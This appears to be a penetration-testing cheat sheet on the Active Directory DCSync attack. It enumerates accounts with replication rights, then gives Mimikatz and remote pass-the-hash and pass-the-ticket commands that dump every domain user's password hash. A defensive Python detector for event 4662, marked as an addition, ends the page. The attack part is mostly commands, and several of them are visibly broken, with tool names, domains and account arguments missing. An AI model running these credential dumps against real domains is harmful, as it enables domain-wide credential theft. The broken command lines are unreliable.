DCSync Overview

DC Sync is a legitimate function of Active Directory environments in which a domain controller makes a sync request to another domain controller in the environment; as such, this is not functionality that can be disabled.

Normally this function is restricted to administrative users and groups, but when domain ACLs are misconfigured and a user is granted the rights to request this sync, it can result in the leaking of the hashed credentials of every user in the domain.

Enumerating ACLs

PowerShell AD Module

I put this one first because it is unlikely to be flagged by on-system AV/EDR, unlike PowerView, which is almost certain to get flagged and removed.

See PowerShell AD Module on Any Domain Host as Any User

# Assumes domain is
# List any objects with ACLs to perform a DC sync
# Requires the ActiveDirectory module (Import-Module ActiveDirectory) so the AD: drive exists.
# The three GUIDs are the extended rights DS-Replication-Get-Changes,
# DS-Replication-Get-Changes-All and DS-Replication-Get-Changes-In-Filtered-Set.
# Note: this only matches ACEs that name those rights explicitly; a principal with
# GenericAll on the domain object holds them too (the PowerView query below checks that).

Get-Acl "ad:\dc=contoso,dc=org" |
    Select -Expand access |
    Where {
        $_.ObjectType -eq "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" -or `
        $_.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" -or `
        $_.ObjectType -eq "89e95b76-444d-4c62-991a-0facbeda640c"
    } | Select -Expand IdentityReference -Unique | Sort


# Assumes domain is
# Enumerate objects with ACLs to perform DC sync
# PowerView; -ResolveGUIDs turns the extended-right GUIDs into names such as DS-Replication-Get-Changes

Get-ObjectAcl -DistinguishedName "dc=contoso,dc=org" -ResolveGUIDs |
    Where { $_.ObjectType -match 'replication-get' -or $_.ActiveDirectoryRights -match 'GenericAll' }

DCSync Attack

Mimikatz (Local)

If you've exploited a host where you have a TGT of a user who can DCSync, you can use Mimikatz to perform the attack.

# Assumes the domain is
# Dump all hashes from the domain controller

lsadump::dcsync / / /all /csv

# Assumes the domain is
# Dump all hashes from the domain controller
# PowerShell Invoke-Mimikatz

Invoke-Mimikatz 'lsadump::dcsync / / /all /csv'

(Remote)

# Assumes domain is

# Password Authentication
-outputfile 'dcsync.txt' ''

# Pass the hash
-outputfile 'dcsync.txt' -hashes 'lm-hash':'nt-hash' ''

# Pass the ticket
# If proxying through jump host, add dc-fqdn to /etc/hosts
python -dc-ip domain-controller-ip -hashes lm-hash:nt-hash ''
export KRB5CCNAME='username.ccache'
-k -outputfile 'something' ''
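Replication itself cannot be turned off (see the overview), so the defensive counterpart to the attack above is spotting replication requests from accounts that should never issue them. The following is an added detection example, not code from the original page: it assumes directory service access auditing is enabled so the domain controller logs Security event 4662 for these control-access rights, takes events already parsed into dictionaries using the 4662 field names, and treats DC machine accounts and an assumed Azure AD Connect account with the default MSOL_ prefix as expected replicators.

```python
import re

# Control access right GUIDs exercised by a DCSync request (the same GUIDs
# the ACL enumeration above filters on).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")


def is_expected_replicator(account):
    # Domain controller machine accounts end in "$"; "MSOL_" is the assumed
    # default Azure AD Connect sync account prefix (adjust per environment).
    return account.endswith("$") or account.upper().startswith("MSOL_")


def classify(event):
    """Return the replication rights named in a 4662 event, or None when the
    event is not a DCSync candidate (wrong event, not a DS object, no
    replication GUID, or an account that is expected to replicate)."""
    if event.get("EventID") != 4662 or event.get("ObjectServer") != "DS":
        return None
    guids = set(GUID_RE.findall(event.get("Properties", "").lower()))
    hits = [name for guid, name in REPLICATION_RIGHTS.items() if guid in guids]
    if not hits or is_expected_replicator(event.get("SubjectUserName", "")):
        return None
    return hits


def alerts(events):
    """List of (account, rights) for every event worth raising."""
    out = []
    for e in events:
        hits = classify(e)
        if hits:
            out.append((e["SubjectUserName"], hits))
    return out


# Constructed sample 4662 events; Properties carries the right GUIDs in braces.
GET_CHANGES = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
SAMPLE_EVENTS = [
    {"EventID": 4662, "ObjectServer": "DS", "SubjectUserName": "DC01$",
     "Properties": "Control Access " + GET_CHANGES},
    {"EventID": 4662, "ObjectServer": "DS", "SubjectUserName": "jsmith",
     "Properties": "Control Access " + GET_CHANGES},
    {"EventID": 4662, "ObjectServer": "DS", "SubjectUserName": "MSOL_0f1e2d3c",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "ObjectServer": "DS", "SubjectUserName": "jsmith",
     "Properties": "Control Access {00000000-0000-0000-0000-000000000000}"},
]
```

Only the second sample event (a plain user account requesting both Get-Changes rights) is raised by `alerts(SAMPLE_EVENTS)`; the DC and MSOL_ accounts are filtered as expected replicators, and the last event names no replication right.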